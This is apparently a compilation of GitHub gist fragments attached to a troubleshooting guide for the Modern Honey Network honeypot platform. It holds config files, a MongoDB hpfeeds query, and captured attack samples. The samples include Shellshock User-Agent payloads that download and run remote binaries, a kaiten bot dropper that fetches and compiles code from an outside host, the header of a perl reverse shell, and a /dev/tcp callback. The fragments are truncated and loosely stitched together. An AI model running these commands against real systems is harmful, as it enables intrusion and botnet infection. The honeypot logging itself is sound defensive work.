Note: This will likely be taken down soon since it has been posted on the MHN wiki here: https://github.com/threatstream/mhn/wiki/MHN-Troubleshooting-Guide
This is a Work in Progress troubleshooting guide to MHN, compiled from responses to questions to the MHN alias (mhn@threatstream.com).
Can you describe the error you're encountering when logging in? Password failure? Connection failure?
| # Copyright (C) 2013 Johnny Vestergaard <jkv@unixcluster.dk> | |
| # | |
| # This program is free software; you can redistribute it and/or | |
| # modify it under the terms of the GNU General Public License | |
| # as published by the Free Software Foundation; either version 2 | |
| # of the License, or (at your option) any later version. | |
| # | |
| # This program is distributed in the hope that it will be useful, | |
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | |
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
| logging = { | |
| default = { | |
| // file not starting with / is taken relative to LOCALESTATEDIR (e.g. /opt/dionaea/var) | |
| file = "/var/dionaea/log/dionaea.log" | |
| levels = "warning,error" | |
| domains = "*" | |
| } | |
| errors = { | |
| // file not starting with / is taken relative to LOCALESTATEDIR (e.g. /opt/dionaea/var) |
| #!/bin/bash | |
| if [ -z "$2" ] ; then | |
| echo "Usage: $0 <input> <output> [start-offset]" | |
| exit 1 | |
| fi | |
| START=$3 | |
| if [ -z "$3" ] ; then |
# mongo
MongoDB shell version: 2.6.2
connecting to: test
> use hpfeeds
switched to db hpfeeds
> db.auth_key.find({"identifier": "mnemosyne"})
{ "_id" : ObjectId("XXXXXXXXXXXXXXXXX"), "identifier" : "mnemosyne", "subscribe" : [ "conpot.events", "thug.events", "beeswarm.hive", "dionaea.capture", "dionaea.connections", "thug.files", "beeswarn.feeder", "cuckoo.analysis", "kippo.sessions", "glastopf.events", "glastopf.files", "mwbinary.dionaea.sensorunique", "snort.alerts" ], "secret" : "YYYYYYYYYYYYYYYYYYYYYYYY", "publish" : [] }
| User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74[.]201[.]85[.]69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*" |
| killall perl | |
| wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c; | |
| curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c; | |
| gcc -o /tmp/a /tmp/a.c; | |
| /tmp/a; | |
| rm -rf /tmp/a.c; | |
| wget http://stablehost.us/bots/a -O /tmp/a; | |
| curl -o /tmp/a http://stablehost.us/bots/a; |
| #!/usr/bin/perl -w | |
| # perl-reverse-shell - A Reverse Shell implementation in PERL | |
| # Copyright (C) 2006 pentestmonkey@pentestmonkey.net | |
| # | |
| # This tool may be used for legal purposes only. Users take full responsibility | |
| # for any actions performed using this tool. The author accepts no liability | |
| # for damage caused by this tool. If these terms are not acceptable to you, then | |
| # do not use this tool. | |
| # | |
| # In all other respects the GPL version 2 applies: |
| source_ip: 128.199.223.129 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi | |
| HTTP Headers: | |
| Host: XXX.XXX.XXX.XXX | |
| Content-Length: | |
| User-Agent: () { :;}; /bin/bash -c "sleep 2" | |
| Content-Type: text/plain | |
| source_ip: 128.199.223.129 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi |
| source_ip: 192.99.247.174 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/report.cgi | |
| HTTP Headers: | |
| Content-Length: | |
| Host: XXX.XXX.XXX.XXX | |
| User-Agent: () { :;}; /bin/bash -c "(echo 'GET /host/ad6a949e2c23b6fe51f0d3991b4a2375c2e7308a0e0f9f347c8c7947ebf7053d' > /dev/tcp/vulnerable.shellshocker.net/8000)" #Your system may be vulnerable to ShellShock. Please visit https://shellshocker.net/ for more information. | |
| Content-Type: text/plain | |
| source_ip: 37.48.65.71 | |
| url: http://XXX.XXX.XXX.XXX/test.cgi |